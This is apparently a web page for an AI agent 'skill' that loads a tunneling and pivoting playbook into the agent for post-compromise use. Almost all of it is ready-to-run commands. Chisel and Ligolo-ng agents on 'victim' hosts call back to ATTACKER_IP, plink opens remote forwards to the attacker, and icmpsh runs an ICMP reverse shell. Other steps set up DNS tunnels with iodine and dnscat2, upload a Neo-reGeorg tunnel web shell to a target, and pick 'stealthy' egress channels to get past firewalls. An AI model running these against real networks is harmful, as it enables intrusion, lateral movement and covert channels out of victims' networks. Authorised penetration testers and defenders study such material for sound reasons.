Loading...
Loading...
Tunneling and pivoting playbook. Use when establishing network tunnels through compromised hosts including SSH tunneling, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunneling, ProxyChains, and multi-layer pivoting strategies.
npx skill4agent add yaklang/hack-skills tunneling-and-pivotingAI LOAD INSTRUCTION: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N
# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N
# Browse: http://localhost:8080
# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N
# Expose attacker's listener to internal network
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N
# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24
# Or with browser SOCKS proxy → browse internal web apps# Single jump
ssh -J jumphost user@TARGET
# Multiple jumps
ssh -J jump1,jump2 user@TARGET
# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
HostName 10.10.10.100
User admin
ProxyJump user@jumphost.example.com# Attacker: start chisel server
chisel server --reverse --port 8080
# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks
# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24# Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306
# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80
# Reverse port forward (expose attacker service to victim network)
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo-proxy console:
>> session # select agent session
>> ifconfig # view agent's network interfaces
>> start # start tunnel
# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo# In ligolo-proxy console:
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444# Agent 1 on DMZ → tunnel to internal network 1
# Agent 2 on internal network 1 → tunnel to internal network 2
# Add routes for both networks on attacker
sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1
sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2# TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80
# UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53
# Encrypted tunnel
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80
# File transfer via socat
# Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
# Sender:
socat TCP:RECEIVER:9999 file:send_file# /etc/proxychains4.conf
strict_chain # fail if any proxy is down
# dynamic_chain # skip dead proxies
# random_chain # randomize proxy order
[ProxyList]
socks5 127.0.0.1 1080 # first hop (SSH dynamic forward)
socks5 127.0.0.1 1081 # second hop (if chaining)# Usage
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24
proxychains crackmapexec smb 10.10.10.0/24
proxychains evil-winrm -i 10.10.10.50 -u admin -p pass:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP
:: List forwards
netsh interface portproxy show all
:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER
:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER
:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER# iodine — IP-over-DNS
# Server (attacker, with NS record pointing to attacker):
iodined -f -c -P password 10.0.0.1 t1.yourdomain.com
# Client (victim):
iodine -f -P password t1.yourdomain.com
# Creates dns0 interface → route traffic through it
# dnscat2 — command channel over DNS
# Server:
ruby dnscat2.rb yourdomain.com
# Client:
./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET# icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)
# Attacker:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
# Victim (Windows):
icmpsh.exe -t ATTACKER_IP
# ptunnel-ng — TCP-over-ICMP
# Server:
ptunnel-ng -r INTERNAL_HOST -R 22
# Client:
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22
ssh -p 2222 user@127.0.0.1# Neo-reGeorg — SOCKS proxy via web shell
# Generate tunnel web shell:
python3 neoreg.py generate -k PASSWORD
# Upload tunnel.php/aspx/jsp to target web server
# Connect:
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
# SOCKS proxy on 127.0.0.1:1080
# Tunna — HTTP tunnel (alternative)
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP| Egress Allowed | Tool | Notes |
|---|---|---|
| TCP outbound (any port) | Chisel, Ligolo-ng, SSH | Fastest setup |
| TCP 80/443 only | Chisel (HTTP/S), Neo-reGeorg | Blend with web traffic |
| DNS only (53/udp) | iodine, dnscat2 | Slow but stealthy |
| ICMP only | ptunnel-ng, icmpsh | Very restricted environments |
| No outbound | Bind shell + port forward in | Needs inbound access to pivot |
| Web shell only | Neo-reGeorg, Tunna | When only HTTP file upload works |
Compromised host — need to reach internal network
│
├── Can install tools on pivot?
│ ├── YES + outbound TCP allowed?
│ │ ├── Need transparent routing? → Ligolo-ng (§3)
│ │ ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)
│ │ └── SSH available? → SSH dynamic forward (§1)
│ │
│ ├── YES + only HTTP(S) outbound?
│ │ ├── Chisel over HTTPS (§2)
│ │ └── Upload web tunnel → Neo-reGeorg (§9)
│ │
│ ├── YES + only DNS outbound?
│ │ └── iodine or dnscat2 (§7)
│ │
│ └── YES + only ICMP allowed?
│ └── ptunnel-ng or icmpsh (§8)
│
├── Cannot install tools (web shell only)?
│ └── Neo-reGeorg / Tunna via web shell (§9)
│
├── Windows pivot?
│ ├── Admin access? → netsh portproxy (§6)
│ ├── SSH client available? → ssh.exe (Windows 10+) (§1)
│ └── Outbound SSH? → plink (§6)
│
├── Need multi-layer pivot?
│ ├── Ligolo-ng: multiple agents + route stacking (§3)
│ ├── SSH ProxyJump chaining (§1)
│ └── ProxyChains with multiple SOCKS (§5)
│
└── Teammate needs access too?
├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)
└── Share Ligolo-ng routes via common proxy